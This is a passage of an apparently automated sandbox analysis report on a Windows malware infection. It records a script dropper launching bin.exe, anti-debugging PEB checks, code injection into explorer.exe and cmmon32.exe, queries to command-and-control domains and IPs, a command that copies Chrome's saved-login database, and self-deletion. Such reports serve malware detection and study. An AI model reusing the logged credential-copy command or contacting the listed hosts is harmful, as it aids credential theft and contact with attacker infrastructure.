Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018203E2 mov eax, dword ptr fs:[00000030h] 2_2_018203E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0181DBE9 mov eax, dword ptr fs:[00000030h] 2_2_0181DBE9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018B131B mov eax, dword ptr fs:[00000030h] 2_2_018B131B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C8B58 mov eax, dword ptr fs:[00000030h] 2_2_018C8B58
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01823B7A mov eax, dword ptr fs:[00000030h] 2_2_01823B7A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01823B7A mov eax, dword ptr fs:[00000030h] 2_2_01823B7A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182D294 mov eax, dword ptr fs:[00000030h] 2_2_0182D294
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182D294 mov eax, dword ptr fs:[00000030h] 2_2_0182D294
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0180AAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0180AAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182FAB0 mov eax, dword ptr fs:[00000030h] 2_2_0182FAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9240 mov eax, dword ptr fs:[00000030h] 2_2_017F9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9240 mov eax, dword ptr fs:[00000030h] 2_2_017F9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9240 mov eax, dword ptr fs:[00000030h] 2_2_017F9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9240 mov eax, dword ptr fs:[00000030h] 2_2_017F9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01822ACB mov eax, dword ptr fs:[00000030h] 2_2_01822ACB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB14FB mov eax, dword ptr fs:[00000030h] 18_2_04FB14FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8B8D0 mov eax, dword ptr fs:[00000030h] 18_2_04F8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8B8D0 mov ecx, dword ptr fs:[00000030h] 18_2_04F8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8B8D0 mov eax, dword ptr fs:[00000030h] 18_2_04F8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8B8D0 mov eax, dword ptr fs:[00000030h] 18_2_04F8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8B8D0 mov eax, dword ptr fs:[00000030h] 18_2_04F8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8B8D0 mov eax, dword ptr fs:[00000030h] 18_2_04F8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC8CD6 mov eax, dword ptr fs:[00000030h] 18_2_04FC8CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2F0BF mov ecx, dword ptr fs:[00000030h] 18_2_04F2F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2F0BF mov eax, dword ptr fs:[00000030h] 18_2_04F2F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2F0BF mov eax, dword ptr fs:[00000030h] 18_2_04F2F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F390AF mov eax, dword ptr fs:[00000030h] 18_2_04F390AF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9080 mov eax, dword ptr fs:[00000030h] 18_2_04EF9080
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F73884 mov eax, dword ptr fs:[00000030h] 18_2_04F73884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F73884 mov eax, dword ptr fs:[00000030h] 18_2_04F73884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB2073 mov eax, dword ptr fs:[00000030h] 18_2_04FB2073
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC1074 mov eax, dword ptr fs:[00000030h] 18_2_04FC1074
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F1746D mov eax, dword ptr fs:[00000030h] 18_2_04F1746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8C450 mov eax, dword ptr fs:[00000030h] 18_2_04F8C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8C450 mov eax, dword ptr fs:[00000030h] 18_2_04F8C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0B02A mov eax, dword ptr fs:[00000030h] 18_2_04F0B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0B02A mov eax, dword ptr fs:[00000030h] 18_2_04F0B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0B02A mov eax, dword ptr fs:[00000030h] 18_2_04F0B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0B02A mov eax, dword ptr fs:[00000030h] 18_2_04F0B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2BC2C mov eax, dword ptr fs:[00000030h] 18_2_04F2BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F77016 mov eax, dword ptr fs:[00000030h] 18_2_04F77016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F77016 mov eax, dword ptr fs:[00000030h] 18_2_04F77016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F77016 mov eax, dword ptr fs:[00000030h] 18_2_04F77016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC4015 mov eax, dword ptr fs:[00000030h] 18_2_04FC4015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC4015 mov eax, dword ptr fs:[00000030h] 18_2_04FC4015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC740D mov eax, dword ptr fs:[00000030h] 18_2_04FC740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC740D mov eax, dword ptr fs:[00000030h] 18_2_04FC740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC740D mov eax, dword ptr fs:[00000030h] 18_2_04FC740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FA8DF1 mov eax, dword ptr fs:[00000030h] 18_2_04FA8DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFB1E1 mov eax, dword ptr fs:[00000030h] 18_2_04EFB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFB1E1 mov eax, dword ptr fs:[00000030h] 18_2_04EFB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFB1E1 mov eax, dword ptr fs:[00000030h] 18_2_04EFB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F235A1 mov eax, dword ptr fs:[00000030h] 18_2_04F235A1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF2D8A mov eax, dword ptr fs:[00000030h] 18_2_04EF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF2D8A mov eax, dword ptr fs:[00000030h] 18_2_04EF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF2D8A mov eax, dword ptr fs:[00000030h] 18_2_04EF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF2D8A mov eax, dword ptr fs:[00000030h] 18_2_04EF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF2D8A mov eax, dword ptr fs:[00000030h] 18_2_04EF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2FD9B mov eax, dword ptr fs:[00000030h] 18_2_04F2FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2FD9B mov eax, dword ptr fs:[00000030h] 18_2_04F2FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F1C182 mov eax, dword ptr fs:[00000030h] 18_2_04F1C182
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2A185 mov eax, dword ptr fs:[00000030h] 18_2_04F2A185
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F1C577 mov eax, dword ptr fs:[00000030h] 18_2_04F1C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F1C577 mov eax, dword ptr fs:[00000030h] 18_2_04F1C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFB171 mov eax, dword ptr fs:[00000030h] 18_2_04EFB171
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFB171 mov eax, dword ptr fs:[00000030h] 18_2_04EFB171
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F17D50 mov eax, dword ptr fs:[00000030h] 18_2_04F17D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F33D43 mov eax, dword ptr fs:[00000030h] 18_2_04F33D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F1B944 mov eax, dword ptr fs:[00000030h] 18_2_04F1B944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F1B944 mov eax, dword ptr fs:[00000030h] 18_2_04F1B944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F73540 mov eax, dword ptr fs:[00000030h] 18_2_04F73540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC8D34 mov eax, dword ptr fs:[00000030h] 18_2_04FC8D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2513A mov eax, dword ptr fs:[00000030h] 18_2_04F2513A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2513A mov eax, dword ptr fs:[00000030h] 18_2_04F2513A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F24D3B mov eax, dword ptr fs:[00000030h] 18_2_04F24D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F24D3B mov eax, dword ptr fs:[00000030h] 18_2_04F24D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F24D3B mov eax, dword ptr fs:[00000030h] 18_2_04F24D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F14120 mov eax, dword ptr fs:[00000030h] 18_2_04F14120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F14120 mov eax, dword ptr fs:[00000030h] 18_2_04F14120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F14120 mov eax, dword ptr fs:[00000030h] 18_2_04F14120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F14120 mov eax, dword ptr fs:[00000030h] 18_2_04F14120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F14120 mov ecx, dword ptr fs:[00000030h] 18_2_04F14120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFAD30 mov eax, dword ptr fs:[00000030h] 18_2_04EFAD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9100 mov eax, dword ptr fs:[00000030h] 18_2_04EF9100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9100 mov eax, dword ptr fs:[00000030h] 18_2_04EF9100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9100 mov eax, dword ptr fs:[00000030h] 18_2_04EF9100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F216E0 mov ecx, dword ptr fs:[00000030h] 18_2_04F216E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F076E2 mov eax, dword ptr fs:[00000030h] 18_2_04F076E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC8ED6 mov eax, dword ptr fs:[00000030h] 18_2_04FC8ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FAFEC0 mov eax, dword ptr fs:[00000030h] 18_2_04FAFEC0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F236CC mov eax, dword ptr fs:[00000030h] 18_2_04F236CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF52A5 mov eax, dword ptr fs:[00000030h] 18_2_04EF52A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF52A5 mov eax, dword ptr fs:[00000030h] 18_2_04EF52A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF52A5 mov eax, dword ptr fs:[00000030h] 18_2_04EF52A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF52A5 mov eax, dword ptr fs:[00000030h] 18_2_04EF52A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF52A5 mov eax, dword ptr fs:[00000030h] 18_2_04EF52A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F746A7 mov eax, dword ptr fs:[00000030h] 18_2_04F746A7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC0EA5 mov eax, dword ptr fs:[00000030h] 18_2_04FC0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC0EA5 mov eax, dword ptr fs:[00000030h] 18_2_04FC0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC0EA5 mov eax, dword ptr fs:[00000030h] 18_2_04FC0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2D294 mov eax, dword ptr fs:[00000030h] 18_2_04F2D294
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2D294 mov eax, dword ptr fs:[00000030h] 18_2_04F2D294
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8FE87 mov eax, dword ptr fs:[00000030h] 18_2_04F8FE87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F3927A mov eax, dword ptr fs:[00000030h] 18_2_04F3927A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FAB260 mov eax, dword ptr fs:[00000030h] 18_2_04FAB260
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FAB260 mov eax, dword ptr fs:[00000030h] 18_2_04FAB260
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0766D mov eax, dword ptr fs:[00000030h] 18_2_04F0766D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9240 mov eax, dword ptr fs:[00000030h] 18_2_04EF9240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9240 mov eax, dword ptr fs:[00000030h] 18_2_04EF9240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9240 mov eax, dword ptr fs:[00000030h] 18_2_04EF9240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9240 mov eax, dword ptr fs:[00000030h] 18_2_04EF9240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FAFE3F mov eax, dword ptr fs:[00000030h] 18_2_04FAFE3F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFE620 mov eax, dword ptr fs:[00000030h] 18_2_04EFE620
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFC600 mov eax, dword ptr fs:[00000030h] 18_2_04EFC600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFC600 mov eax, dword ptr fs:[00000030h] 18_2_04EFC600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFC600 mov eax, dword ptr fs:[00000030h] 18_2_04EFC600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC5BA5 mov eax, dword ptr fs:[00000030h] 18_2_04FC5BA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB138A mov eax, dword ptr fs:[00000030h] 18_2_04FB138A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FAD380 mov ecx, dword ptr fs:[00000030h] 18_2_04FAD380
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F01B8F mov eax, dword ptr fs:[00000030h] 18_2_04F01B8F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F01B8F mov eax, dword ptr fs:[00000030h] 18_2_04F01B8F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFDB60 mov ecx, dword ptr fs:[00000030h] 18_2_04EFDB60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC8F6A mov eax, dword ptr fs:[00000030h] 18_2_04FC8F6A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC8B58 mov eax, dword ptr fs:[00000030h] 18_2_04FC8B58
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFDB40 mov eax, dword ptr fs:[00000030h] 18_2_04EFDB40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0EF40 mov eax, dword ptr fs:[00000030h] 18_2_04F0EF40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFF358 mov eax, dword ptr fs:[00000030h] 18_2_04EFF358
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF4F2E mov eax, dword ptr fs:[00000030h] 18_2_04EF4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF4F2E mov eax, dword ptr fs:[00000030h] 18_2_04EF4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2E730 mov eax, dword ptr fs:[00000030h] 18_2_04F2E730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB131B mov eax, dword ptr fs:[00000030h] 18_2_04FB131B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8FF10 mov eax, dword ptr fs:[00000030h] 18_2_04F8FF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8FF10 mov eax, dword ptr fs:[00000030h] 18_2_04F8FF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC070D mov eax, dword ptr fs:[00000030h] 18_2_04FC070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC070D mov eax, dword ptr fs:[00000030h] 18_2_04FC070D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000BA140 LdrLoadDll, 2_2_000BA140

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exe File created: bin.exe.0.dr
Source: C:\Windows\explorer.exe Domain query: www.ratebill.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Network Connect: 104.21.4.45 80
Source: C:\Windows\explorer.exe Network Connect: 85.159.66.93 80
Source: C:\Windows\explorer.exe Domain query: www.interlink-travel.com
Source: C:\Windows\explorer.exe Domain query: www.2264a.com
Source: C:\Windows\explorer.exe Domain query: www.rasheedabossmoves.com
Source: C:\Windows\explorer.exe Network Connect: 134.122.201.217 80
Source: C:\Windows\explorer.exe Domain query: www.siberup.xyz
Source: C:\Windows\explorer.exe Network Connect: 137.220.133.198 80
Source: C:\Windows\explorer.exe Domain query: www.brandpay.xyz
Source: C:\Windows\explorer.exe Network Connect: 172.96.186.204 80
Source: C:\Windows\explorer.exe Domain query: www.liveafunday.xyz
Source: C:\Windows\explorer.exe Domain query: www.thepowerofanopenquestion.com
Source: C:\Windows\explorer.exe Network Connect: 154.220.100.142 80
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe Domain query: www.kishanshree.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80
Source: C:\Windows\explorer.exe Domain query: www.jdhwh2nbiw234.com
Source: C:\Windows\explorer.exe Network Connect: 132.148.165.111 80
Source: C:\Windows\explorer.exe Network Connect: 52.17.85.125 80
Source: C:\Windows\explorer.exe Domain query: www.brawlhallacodestore.com
Source: C:\Windows\explorer.exe Domain query: www.heavymettlelawyers.com
Source: C:\Windows\explorer.exe Domain query: www.o7oiwlp.xyz
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread register set: target process: 3968
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3968
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: explorer.exe, 00000004.00000000.376133769.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.418255803.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.290738816.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000004.00000000.314875583.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.366041881.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.354116573.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.354116573.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.418645312.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.294537986.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.354116573.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.418645312.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.294537986.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.290950319.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.376901277.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.353174181.0000000000708000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000004.00000000.354116573.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.418645312.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.294537986.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: wscript.exe, 00000001.00000002.823061632.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.710419967.000001B745425000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554212669.000001B74541F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ows Defender\MsMpeng.exe
